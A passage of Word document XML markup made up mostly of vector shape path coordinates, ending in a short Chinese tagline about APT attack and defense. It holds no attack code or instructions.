,8623,4075,8623,4080,8623,4086,8623,4091,8623,4096,8623,4102,8623,4107,8623,4113,8623,4118,8623,4124,8623,4130,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8623,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8624,4136,8625,4136,8625,4136,8625,4136,8625,4136,8625,4136,8626,4136,8626,4136,8626,4136,8627,4136,8627,4136,8627,4136,8628,4136,8628,4136,8629,4136,8629,4136,8630,4136,8630,4136,8631,4136,8632,4136,8632,4136,8633,4136,8634,4136,8635,4136,8635,4136,8636,4136,8637,4136,8638,4136,8639,4136,8640,4136,8641,4136,8642,4136,8643,4136,8645,4136,8646,4136,8647,4136,8649,4136,8650,4136,8651,4136,8653,4136,8654,4136,8656,4136,8658,4136,8659,4136,8661,4136,8663,4136,8665,4136,8667,4136,8669,4136,8671,4136,8673,4136,8675,4136,8678,4136,8680,4136,8682,4136,8685,4136,8687,4136,8690,4136,8692,4136,8695,4136,8698,4136,8701,4136,8704,4136,8707,4136,8710,4136,8713,4136,8716,4136,8720,4136,8723,4136,8727,4136,8730,4136,8734,4136,8737,4136,8741,4136,8745,4136,8749,4136,8753,4136,8757,4136,8762,4136,8766,4136,8770,4136,8775,4136,8779,4136,8784,4136,8789,4136,8794,4136,8799,4136,8804,4136,8809,4136,8814,4136,8819,4136,8825,4136,8830,4136,8836,4136,8842,4136,8848,4136,8854,4136,8860,4136,8866,4136,8872,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4136,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4135,8878,4134,8878,4134,8878,4134,8878,4134,8878,4133,8878,4133,8878,4133,8878,4132,8878,4132,8878,4131,8878,4131,8878,4130,8878,4130,8878,4129,8878,4129,8878,4128,8878,4128,8878,4127,8878,4126,8878,4126,8878,4125,8878,4124,8878,4123,8878,4122,8878,4121,8878,4120,8878,4119,8878,4118,8878,4117,8878,4116,8878,4115,8878,4114,8878,4112,8878,4111,8878,4110,8878,4108,8878,4107,8878,4105,8878,4104,8878,4102,8878,4100,8878,4099,8878,4097,8878,4095,8878,4093,8878,4091,8878,4089,8878,4087,8878,4085,8878,4083,8878,4081,8878,4078,8878,4076,8878,4074,8878,4071,8878,4068,8878,4066,8878,4063,8878,4060,8878,4058,8878,4055,8878,4052,8878,4049,8878,4045,8878,4042,8878,4039,8878,4036,8878,4032,8878,4029,8878,4025,8878,4021,8878,4018,8878,4014,8878,4010,8878,4006,8878,4002,8878,3998,8878,3994,8878,3989,8878,3985,8878,3980,8878,3976,8878,3971,8878,3966,8878,3962,8878,3957,8878,3952,8878,3946,8878,3941,8878,3936,8878,3930,8878,3925,8878,3919,8878,3914,8878,3908,8878,3902,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8878,3896,8877,3896,8877,3896,8877,3896,8877,3896,8877,3896,8876,3896,8876,3896,8876,3896,8875,3896,8875,3896,8875,3896,8874,3896,8874,3896,8874,3896,8873,3896,8873,3896,8872,3896,8871,3896,8871,3896,8870,3896,8869,3896,8869,3896,8868,3896,8867,3896,8866,3896,8866,3896,8865,3896,8864,3896,8863,3896,8862,3896,8861,3896,8860,3896,8858,3896,8857,3896,8856,3896,8855,3896,8853,3896,8852,3896,8850,3896,8849,3896,8847,3896,8846,3896,8844,3896,8842,3896,8841,3896,8839,3896,8837,3896,8835,3896,8833,3896,8831,3896,8829,3896,8827,3896,8824,3896,8822,3896,8820,3896,8817,3896,8815,3896,8812,3896,8809,3896,8807,3896,8804,3896,8801,3896,8798,3896,8795,3896,8792,3896,8789,3896,8785,3896,8782,3896,8779,3896,8775,3896,8772,3896,8768,3896,8764,3896,8761,3896,8757,3896,8753,3896,8749,3896,8745,3896,8740,3896,8736,3896,8732,3896,8727,3896,8722,3896,8718,3896,8713,3896,8708,3896,8703,3896,8698,3896,8693,3896,8688,3896,8682,3896,8677,3896,8671,3896,8666,3896,8660,3896,8654,3896,8648,3896,8642,3896,8636,3896,8630,3896,8623e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:651.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,13030" coordsize="130,270">
        <v:shape style="position:absolute;left:4830;top:13030;width:130;height:270" coordorigin="4830,13030" coordsize="130,270" path="m4856,13051l4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4856,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4857,13051,4858,13051,4858,13051,4858,13051,4858,13051,4858,13051,4858,13051,4859,13051,4859,13051,4859,13051,4859,13051,4860,13051,4860,13051,4860,13051,4860,13051,4861,13051,4861,13051,4861,13051,4862,13051,4862,13051,4863,13051,4863,13051,4863,13051,4864,13051,4864,13051,4865,13051,4865,13051,4866,13051,4866,13051,4867,13051,4868,13051,4868,13051,4869,13051,4870,13051,4870,13051,4871,13051,4872,13051,4873,13051,4873,13051,4874,13051,4875,13051,4876,13051,4877,13051,4878,13051,4879,13051,4880,13051,4881,13051,4882,13051,4883,13051,4884,13051,4885,13051,4887,13051,4888,13051,4889,13051,4890,13051,4892,13051,4893,13051,4894,13051,4896,13051,4897,13051,4899,13051,4900,13051,4902,13051,4903,13051,4905,13051,4907,13051,4908,13051,4910,13051,4912,13051,4914,13051,4916,13051,4918,13051,4919,13051,4921,13051,4924,13051,4926,13051,4928,13051,4930,13051,4932,13051,4934,13051,4937,13051,4939,13051,4941,13051,4944,13051,4946,13051,4949,13051,4951,13051,4954,13051,4957,13051,4959,13051,4962,13051,4965,13051,4968,13051,4971,13051,4974,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13051,4977,13052,4977,13052,4977,13052,4977,13052,4977,13052,4977,13053,4977,13053,4977,13053,4977,13054,4977,13054,4977,13054,4977,13055,4977,13055,4977,13056,4977,13056,4977,13057,4977,13057,4977,13058,4977,13058,4977,13059,4977,13060,4977,13060,4977,13061,4977,13062,4977,13063,4977,13063,4977,13064,4977,13065,4977,13066,4977,13067,4977,13068,4977,13070,4977,13071,4977,13072,4977,13073,4977,13074,4977,13076,4977,13077,4977,13079,4977,13080,4977,13082,4977,13083,4977,13085,4977,13087,4977,13088,4977,13090,4977,13092,4977,13094,4977,13096,4977,13098,4977,13100,4977,13103,4977,13105,4977,13107,4977,13109,4977,13112,4977,13114,4977,13117,4977,13120,4977,13122,4977,13125,4977,13128,4977,13131,4977,13134,4977,13137,4977,13140,4977,13144,4977,13147,4977,13150,4977,13154,4977,13157,4977,13161,4977,13165,4977,13168,4977,13172,4977,13176,4977,13180,4977,13185,4977,13189,4977,13193,4977,13197,4977,13202,4977,13207,4977,13211,4977,13216,4977,13221,4977,13226,4977,13231,4977,13236,4977,13241,4977,13247,4977,13252,4977,13258,4977,13263,4977,13269,4977,13275,4977,13281,4977,13287,4977,13293,4977,13299,4977,13306,4977,13306,4977,13306,4977,13306,4977,13306,4977,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4976,13306,4975,13306,4975,13306,4975,13306,4975,13306,4975,13306,4975,13306,4974,13306,4974,13306,4974,13306,4974,13306,4973,13306,4973,13306,4973,13306,4973,13306,4972,13306,4972,13306,4972,13306,4971,13306,4971,13306,4970,13306,4970,13306,4970,13306,4969,13306,4969,13306,4968,13306,4968,13306,4967,13306,4966,13306,4966,13306,4965,13306,4965,13306,4964,13306,4963,13306,4963,13306,4962,13306,4961,13306,4960,13306,4960,13306,4959,13306,4958,13306,4957,13306,4956,13306,4955,13306,4954,13306,4953,13306,4952,13306,4951,13306,4950,13306,4949,13306,4948,13306,4946,13306,4945,13306,4944,13306,4943,13306,4941,13306,4940,13306,4939,13306,4937,13306,4936,13306,4934,13306,4933,13306,4931,13306,4930,13306,4928,13306,4926,13306,4925,13306,4923,13306,4921,13306,4919,13306,4917,13306,4915,13306,4913,13306,4911,13306,4909,13306,4907,13306,4905,13306,4903,13306,4901,13306,4899,13306,4896,13306,4894,13306,4892,13306,4889,13306,4887,13306,4884,13306,4882,13306,4879,13306,4876,13306,4874,13306,4871,13306,4868,13306,4865,13306,4862,13306,4859,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13306,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13305,4856,13304,4856,13304,4856,13304,4856,13304,4856,13304,4856,13303,4856,13303,4856,13303,4856,13302,4856,13302,4856,13302,4856,13301,4856,13301,4856,13300,4856,13300,4856,13299,4856,13299,4856,13298,4856,13297,4856,13297,4856,13296,4856,13295,4856,13294,4856,13294,4856,13293,4856,13292,4856,13291,4856,13290,4856,13289,4856,13288,4856,13287,4856,13286,4856,13284,4856,13283,4856,13282,4856,13281,4856,13279,4856,13278,4856,13276,4856,13275,4856,13273,4856,13271,4856,13270,4856,13268,4856,13266,4856,13264,4856,13262,4856,13260,4856,13258,4856,13256,4856,13254,4856,13252,4856,13249,4856,13247,4856,13244,4856,13242,4856,13239,4856,13237,4856,13234,4856,13231,4856,13228,4856,13225,4856,13222,4856,13219,4856,13216,4856,13213,4856,13209,4856,13206,4856,13203,4856,13199,4856,13195,4856,13192,4856,13188,4856,13184,4856,13180,4856,13176,4856,13172,4856,13168,4856,13163,4856,13159,4856,13154,4856,13150,4856,13145,4856,13140,4856,13135,4856,13130,4856,13125,4856,13120,4856,13115,4856,13110,4856,13104,4856,13099,4856,13093,4856,13087,4856,13081,4856,13075,4856,13069,4856,13063,4856,13057,4856,13051e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:651.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,13030" coordsize="130,270">
        <v:shape style="position:absolute;left:5430;top:13030;width:130;height:270" coordorigin="5430,13030" coordsize="130,270" path="m5457,13051l5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5457,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5458,13051,5459,13051,5459,13051,5459,13051,5459,13051,5460,13051,5460,13051,5460,13051,5460,13051,5461,13051,5461,13051,5461,13051,5462,13051,5462,13051,5462,13051,5463,13051,5463,13051,5464,13051,5464,13051,5465,13051,5465,13051,5466,13051,5466,13051,5467,13051,5467,13051,5468,13051,5469,13051,5469,13051,5470,13051,5471,13051,5471,13051,5472,13051,5473,13051,5474,13051,5475,13051,5475,13051,5476,13051,5477,13051,5478,13051,5479,13051,5480,13051,5481,13051,5482,13051,5483,13051,5484,13051,5486,13051,5487,13051,5488,13051,5489,13051,5491,13051,5492,13051,5493,13051,5495,13051,5496,13051,5497,13051,5499,13051,5501,13051,5502,13051,5504,13051,5505,13051,5507,13051,5509,13051,5510,13051,5512,13051,5514,13051,5516,13051,5518,13051,5520,13051,5522,13051,5524,13051,5526,13051,5528,13051,5530,13051,5532,13051,5535,13051,5537,13051,5539,13051,5542,13051,5544,13051,5546,13051,5549,13051,5552,13051,5554,13051,5557,13051,5560,13051,5562,13051,5565,13051,5568,13051,5571,13051,5574,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13051,5577,13052,5577,13052,5577,13052,5577,13052,5577,13052,5577,13053,5577,13053,5577,13053,5577,13054,5577,13054,5577,13054,5577,13055,5577,13055,5577,13056,5577,13056,5577,13057,5577,13057,5577,13058,5577,13058,5577,13059,5577,13060,5577,13060,5577,13061,5577,13062,5577,13063,5577,13063,5577,13064,5577,13065,5577,13066,5577,13067,5577,13068,5577,13070,5577,13071,5577,13072,5577,13073,5577,13074,5577,13076,5577,13077,5577,13079,5577,13080,5577,13082,5577,13083,5577,13085,5577,13087,5577,13088,5577,13090,5577,13092,5577,13094,5577,13096,5577,13098,5577,13100,5577,13103,5577,13105,5577,13107,5577,13109,5577,13112,5577,13114,5577,13117,5577,13120,5577,13122,5577,13125,5577,13128,5577,13131,5577,13134,5577,13137,5577,13140,5577,13144,5577,13147,5577,13150,5577,13154,5577,13157,5577,13161,5577,13165,5577,13168,5577,13172,5577,13176,5577,13180,5577,13185,5577,13189,5577,13193,5577,13197,5577,13202,5577,13207,5577,13211,5577,13216,5577,13221,5577,13226,5577,13231,5577,13236,5577,13241,5577,13247,5577,13252,5577,13258,5577,13263,5577,13269,5577,13275,5577,13281,5577,13287,5577,13293,5577,13299,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5577,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5576,13306,5575,13306,5575,13306,5575,13306,5575,13306,5575,13306,5574,13306,5574,13306,5574,13306,5574,13306,5573,13306,5573,13306,5573,13306,5573,13306,5572,13306,5572,13306,5572,13306,5571,13306,5571,13306,5570,13306,5570,13306,5569,13306,5569,13306,5568,13306,5568,13306,5567,13306,5567,13306,5566,13306,5566,13306,5565,13306,5564,13306,5564,13306,5563,13306,5562,13306,5561,13306,5561,13306,5560,13306,5559,13306,5558,13306,5557,13306,5556,13306,5555,13306,5554,13306,5553,13306,5552,13306,5551,13306,5550,13306,5549,13306,5548,13306,5547,13306,5546,13306,5544,13306,5543,13306,5542,13306,5540,13306,5539,13306,5538,13306,5536,13306,5535,13306,5533,13306,5531,13306,5530,13306,5528,13306,5527,13306,5525,13306,5523,13306,5521,13306,5520,13306,5518,13306,5516,13306,5514,13306,5512,13306,5510,13306,5508,13306,5506,13306,5503,13306,5501,13306,5499,13306,5497,13306,5494,13306,5492,13306,5490,13306,5487,13306,5485,13306,5482,13306,5479,13306,5477,13306,5474,13306,5471,13306,5468,13306,5466,13306,5463,13306,5460,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13306,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13305,5457,13304,5457,13304,5457,13304,5457,13304,5457,13304,5457,13303,5457,13303,5457,13303,5457,13302,5457,13302,5457,13302,5457,13301,5457,13301,5457,13300,5457,13300,5457,13299,5457,13299,5457,13298,5457,13297,5457,13297,5457,13296,5457,13295,5457,13294,5457,13294,5457,13293,5457,13292,5457,13291,5457,13290,5457,13289,5457,13288,5457,13287,5457,13286,5457,13284,5457,13283,5457,13282,5457,13281,5457,13279,5457,13278,5457,13276,5457,13275,5457,13273,5457,13271,5457,13270,5457,13268,5457,13266,5457,13264,5457,13262,5457,13260,5457,13258,5457,13256,5457,13254,5457,13252,5457,13249,5457,13247,5457,13244,5457,13242,5457,13239,5457,13237,5457,13234,5457,13231,5457,13228,5457,13225,5457,13222,5457,13219,5457,13216,5457,13213,5457,13209,5457,13206,5457,13203,5457,13199,5457,13195,5457,13192,5457,13188,5457,13184,5457,13180,5457,13176,5457,13172,5457,13168,5457,13163,5457,13159,5457,13154,5457,13150,5457,13145,5457,13140,5457,13135,5457,13130,5457,13125,5457,13120,5457,13115,5457,13110,5457,13104,5457,13099,5457,13093,5457,13087,5457,13081,5457,13075,5457,13069,5457,13063,5457,13057,5457,13051e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:665.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,13310" coordsize="130,250">
        <v:shape style="position:absolute;left:3390;top:13310;width:130;height:250" coordorigin="3390,13310" coordsize="130,250" path="m3401,13321l3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3401,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3402,13321,3403,13321,3403,13321,3403,13321,3403,13321,3404,13321,3404,13321,3404,13321,3404,13321,3405,13321,3405,13321,3405,13321,3406,13321,3406,13321,3406,13321,3407,13321,3407,13321,3408,13321,3408,13321,3409,13321,3409,13321,3410,13321,3410,13321,3411,13321,3411,13321,3412,13321,3413,13321,3413,13321,3414,13321,3415,13321,3415,13321,3416,13321,3417,13321,3418,13321,3419,13321,3419,13321,3420,13321,3421,13321,3422,13321,3423,13321,3424,13321,3425,13321,3426,13321,3427,13321,3428,13321,3430,13321,3431,13321,3432,13321,3433,13321,3435,13321,3436,13321,3437,13321,3439,13321,3440,13321,3441,13321,3443,13321,3444,13321,3446,13321,3448,13321,3449,13321,3451,13321,3453,13321,3454,13321,3456,13321,3458,13321,3460,13321,3462,13321,3464,13321,3466,13321,3468,13321,3470,13321,3472,13321,3474,13321,3476,13321,3479,13321,3481,13321,3483,13321,3486,13321,3488,13321,3490,13321,3493,13321,3496,13321,3498,13321,3501,13321,3504,13321,3506,13321,3509,13321,3512,13321,3515,13321,3518,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13321,3521,13322,3521,13322,3521,13322,3521,13322,3521,13322,3521,13323,3521,13323,3521,13323,3521,13323,3521,13324,3521,13324,3521,13324,3521,13325,3521,13325,3521,13326,3521,13326,3521,13327,3521,13327,3521,13328,3521,13328,3521,13329,3521,13330,3521,13330,3521,13331,3521,13332,3521,13333,3521,13334,3521,13335,3521,13335,3521,13336,3521,13337,3521,13339,3521,13340,3521,13341,3521,13342,3521,13343,3521,13345,3521,13346,3521,13347,3521,13349,3521,13350,3521,13352,3521,13353,3521,13355,3521,13357,3521,13359,3521,13360,3521,13362,3521,13364,3521,13366,3521,13368,3521,13370,3521,13373,3521,13375,3521,13377,3521,13380,3521,13382,3521,13385,3521,13387,3521,13390,3521,13393,3521,13395,3521,13398,3521,13401,3521,13404,3521,13407,3521,13410,3521,13414,3521,13417,3521,13420,3521,13424,3521,13427,3521,13431,3521,13435,3521,13439,3521,13442,3521,13446,3521,13451,3521,13455,3521,13459,3521,13463,3521,13468,3521,13472,3521,13477,3521,13481,3521,13486,3521,13491,3521,13496,3521,13501,3521,13506,3521,13511,3521,13517,3521,13522,3521,13528,3521,13533,3521,13539,3521,13545,3521,13551,3521,13557,3521,13563,3521,13569,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3521,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3520,13576,3519,13576,3519,13576,3519,13576,3519,13576,3519,13576,3518,13576,3518,13576,3518,13576,3518,13576,3517,13576,3517,13576,3517,13576,3517,13576,3516,13576,3516,13576,3515,13576,3515,13576,3515,13576,3514,13576,3514,13576,3513,13576,3513,13576,3512,13576,3512,13576,3511,13576,3511,13576,3510,13576,3510,13576,3509,13576,3508,13576,3508,13576,3507,13576,3506,13576,3505,13576,3505,13576,3504,13576,3503,13576,3502,13576,3501,13576,3500,13576,3499,13576,3498,13576,3497,13576,3496,13576,3495,13576,3494,13576,3493,13576,3492,13576,3491,13576,3489,13576,3488,13576,3487,13576,3486,13576,3484,13576,3483,13576,3481,13576,3480,13576,3479,13576,3477,13576,3475,13576,3474,13576,3472,13576,3471,13576,3469,13576,3467,13576,3465,13576,3463,13576,3462,13576,3460,13576,3458,13576,3456,13576,3454,13576,3452,13576,3450,13576,3447,13576,3445,13576,3443,13576,3441,13576,3438,13576,3436,13576,3433,13576,3431,13576,3429,13576,3426,13576,3423,13576,3421,13576,3418,13576,3415,13576,3412,13576,3410,13576,3407,13576,3404,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13576,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13575,3401,13574,3401,13574,3401,13574,3401,13574,3401,13573,3401,13573,3401,13573,3401,13573,3401,13572,3401,13572,3401,13571,3401,13571,3401,13570,3401,13570,3401,13569,3401,13569,3401,13568,3401,13568,3401,13567,3401,13566,3401,13565,3401,13565,3401,13564,3401,13563,3401,13562,3401,13561,3401,13560,3401,13559,3401,13558,3401,13557,3401,13556,3401,13555,3401,13553,3401,13552,3401,13551,3401,13549,3401,13548,3401,13546,3401,13545,3401,13543,3401,13541,3401,13540,3401,13538,3401,13536,3401,13534,3401,13532,3401,13530,3401,13528,3401,13526,3401,13524,3401,13522,3401,13519,3401,13517,3401,13514,3401,13512,3401,13509,3401,13507,3401,13504,3401,13501,3401,13498,3401,13495,3401,13492,3401,13489,3401,13486,3401,13483,3401,13480,3401,13476,3401,13473,3401,13469,3401,13465,3401,13462,3401,13458,3401,13454,3401,13450,3401,13446,3401,13442,3401,13438,3401,13433,3401,13429,3401,13424,3401,13420,3401,13415,3401,13410,3401,13406,3401,13401,3401,13396,3401,13390,3401,13385,3401,13380,3401,13374,3401,13369,3401,13363,3401,13357,3401,13352,3401,13346,3401,13340,3401,13333,3401,13327,3401,13321e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:665.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,13310" coordsize="130,250">
        <v:shape style="position:absolute;left:5430;top:13310;width:130;height:250" coordorigin="5430,13310" coordsize="130,250" path="m5442,13321l5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5442,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5443,13321,5444,13321,5444,13321,5444,13321,5444,13321,5445,13321,5445,13321,5445,13321,5445,13321,5446,13321,5446,13321,5446,13321,5447,13321,5447,13321,5447,13321,5448,13321,5448,13321,5449,13321,5449,13321,5450,13321,5450,13321,5451,13321,5451,13321,5452,13321,5452,13321,5453,13321,5454,13321,5454,13321,5455,13321,5456,13321,5456,13321,5457,13321,5458,13321,5459,13321,5460,13321,5460,13321,5461,13321,5462,13321,5463,13321,5464,13321,5465,13321,5466,13321,5467,13321,5468,13321,5469,13321,5471,13321,5472,13321,5473,13321,5474,13321,5476,13321,5477,13321,5478,13321,5480,13321,5481,13321,5482,13321,5484,13321,5485,13321,5487,13321,5489,13321,5490,13321,5492,13321,5494,13321,5495,13321,5497,13321,5499,13321,5501,13321,5503,13321,5505,13321,5507,13321,5509,13321,5511,13321,5513,13321,5515,13321,5517,13321,5520,13321,5522,13321,5524,13321,5527,13321,5529,13321,5531,13321,5534,13321,5537,13321,5539,13321,5542,13321,5545,13321,5547,13321,5550,13321,5553,13321,5556,13321,5559,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13321,5562,13322,5562,13322,5562,13322,5562,13322,5562,13322,5562,13323,5562,13323,5562,13323,5562,13323,5562,13324,5562,13324,5562,13324,5562,13325,5562,13325,5562,13326,5562,13326,5562,13327,5562,13327,5562,13328,5562,13328,5562,13329,5562,13330,5562,13330,5562,13331,5562,13332,5562,13333,5562,13334,5562,13335,5562,13335,5562,13336,5562,13337,5562,13339,5562,13340,5562,13341,5562,13342,5562,13343,5562,13345,5562,13346,5562,13347,5562,13349,5562,13350,5562,13352,5562,13353,5562,13355,5562,13357,5562,13359,5562,13360,5562,13362,5562,13364,5562,13366,5562,13368,5562,13370,5562,13373,5562,13375,5562,13377,5562,13380,5562,13382,5562,13385,5562,13387,5562,13390,5562,13393,5562,13395,5562,13398,5562,13401,5562,13404,5562,13407,5562,13410,5562,13414,5562,13417,5562,13420,5562,13424,5562,13427,5562,13431,5562,13435,5562,13439,5562,13442,5562,13446,5562,13451,5562,13455,5562,13459,5562,13463,5562,13468,5562,13472,5562,13477,5562,13481,5562,13486,5562,13491,5562,13496,5562,13501,5562,13506,5562,13511,5562,13517,5562,13522,5562,13528,5562,13533,5562,13539,5562,13545,5562,13551,5562,13557,5562,13563,5562,13569,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5562,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5561,13576,5560,13576,5560,13576,5560,13576,5560,13576,5560,13576,5559,13576,5559,13576,5559,13576,5559,13576,5558,13576,5558,13576,5558,13576,5558,13576,5557,13576,5557,13576,5557,13576,5556,13576,5556,13576,5555,13576,5555,13576,5554,13576,5554,13576,5553,13576,5553,13576,5552,13576,5552,13576,5551,13576,5551,13576,5550,13576,5549,13576,5549,13576,5548,13576,5547,13576,5546,13576,5546,13576,5545,13576,5544,13576,5543,13576,5542,13576,5541,13576,5540,13576,5539,13576,5538,13576,5537,13576,5536,13576,5535,13576,5534,13576,5533,13576,5532,13576,5531,13576,5529,13576,5528,13576,5527,13576,5525,13576,5524,13576,5523,13576,5521,13576,5520,13576,5518,13576,5516,13576,5515,13576,5513,13576,5512,13576,5510,13576,5508,13576,5506,13576,5504,13576,5503,13576,5501,13576,5499,13576,5497,13576,5495,13576,5493,13576,5491,13576,5488,13576,5486,13576,5484,13576,5482,13576,5479,13576,5477,13576,5475,13576,5472,13576,5470,13576,5467,13576,5464,13576,5462,13576,5459,13576,5456,13576,5453,13576,5451,13576,5448,13576,5445,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13576,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13575,5442,13574,5442,13574,5442,13574,5442,13574,5442,13573,5442,13573,5442,13573,5442,13573,5442,13572,5442,13572,5442,13571,5442,13571,5442,13570,5442,13570,5442,13569,5442,13569,5442,13568,5442,13568,5442,13567,5442,13566,5442,13565,5442,13565,5442,13564,5442,13563,5442,13562,5442,13561,5442,13560,5442,13559,5442,13558,5442,13557,5442,13556,5442,13555,5442,13553,5442,13552,5442,13551,5442,13549,5442,13548,5442,13546,5442,13545,5442,13543,5442,13541,5442,13540,5442,13538,5442,13536,5442,13534,5442,13532,5442,13530,5442,13528,5442,13526,5442,13524,5442,13522,5442,13519,5442,13517,5442,13514,5442,13512,5442,13509,5442,13507,5442,13504,5442,13501,5442,13498,5442,13495,5442,13492,5442,13489,5442,13486,5442,13483,5442,13480,5442,13476,5442,13473,5442,13469,5442,13465,5442,13462,5442,13458,5442,13454,5442,13450,5442,13446,5442,13442,5442,13438,5442,13433,5442,13429,5442,13424,5442,13420,5442,13415,5442,13410,5442,13406,5442,13401,5442,13396,5442,13390,5442,13385,5442,13380,5442,13374,5442,13369,5442,13363,5442,13357,5442,13352,5442,13346,5442,13340,5442,13333,5442,13327,5442,13321e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:734.400pt;width:467.400pt;height:27.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13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0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专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注APT攻击与防御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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
